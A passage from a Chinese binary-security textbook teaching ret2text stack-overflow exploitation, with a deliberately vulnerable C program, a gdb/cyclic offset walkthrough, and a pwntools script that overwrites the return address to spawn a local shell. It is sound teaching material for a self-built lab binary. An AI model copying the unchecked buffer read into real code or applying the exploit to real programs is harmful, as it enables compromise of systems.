栈溢出产生的主要原因是对一些边界未进行严格检查,攻击者可以通过覆盖函数的返回地址执行任意代码。栈溢出漏洞主要的利用方式是ROP(Return Oriented Programming,返回导向编程),通过覆盖返回地址,使程序跳转到恶意代码中,跳转的目标可以是:一段可以执行恶意命令的函数;某个全局变量空间;一个libc中的函数;一个系统调用的CPU指令序列等。
ret2text是栈溢出漏洞利用的一种方式,在程序的控制权发生跳转时,修改EIP为攻击指令的地址,且攻击指令是程序本身已有的代码(.text)。下面通过案例,实现基于ret2text方式栈溢出漏洞利用。
(1)编写C语言代码,保存文件名为“ret2text.c”,代码如下所示:
#include<stdio.h>
char sh[] = "/bin/sh";
int func()
{
system(sh);
return 0;
}
int dofunc()
{
char buf[8] = {};
puts("input:");
read(0, buf, 0x100);
return 0;
}
int main(int argc, char* argv[])
{
dofunc();
return 0;
}
由程序源码可知,dofunc函数返回时,可以利用read函数向buf写入适当数据,实现覆盖EIP,使程序跳转至func函数。为达到漏洞利用的目标,需要获取两个数据信息:buf与ebp的距离、func函数的地址。
(2)执行“gcc -m32 -fno-stack-protector ret2text.c -o ret2text”命令,编译程序,再使用gdb调试程序,使程序运行到read函数,执行“cyclic 200”命令,生成200个字符。结果如图11-28所示。
图11-28
(3)继续执行程序,输入步骤2中生成的字符。结果如图11-29所示。
图11-29
由图可知,ebp地址存储的字符为“eaaa”,执行“cyclic -l eaaa”,结果如图11-30所示。由图可知,buf与ebp的距离为16个字节,即0x10。
图11-30
(4)使用IDA打开ret2text程序,查看func函数地址,结果如图11-31所示。由图可知,func函数地址为0x0804846B。
图11-31
(5)编写exp脚本,保存文件名为“ret2text.py”,代码如下:
from pwn import *
context(arch = "i386", os = "linux")
p = process("./ret2text")
padding2ebp = 0x10
sys_addr = 0x0804846B
payload = 'a' * (padding2ebp + 4) + p32(sys_addr)
out = "input:"
p.sendlineafter(out, payload)
p.interactive()
执行“python ret2text.py”命令,运行脚本,获取系统shell,再执行“ls”命令,测试shell能否正常使用,结果如图11-32所示。由图可知,栈溢出漏洞利用成功,获取的shell能够正常使用。
图11-32
本文节选自《二进制安全基础》,获出版社和作者授权发布。
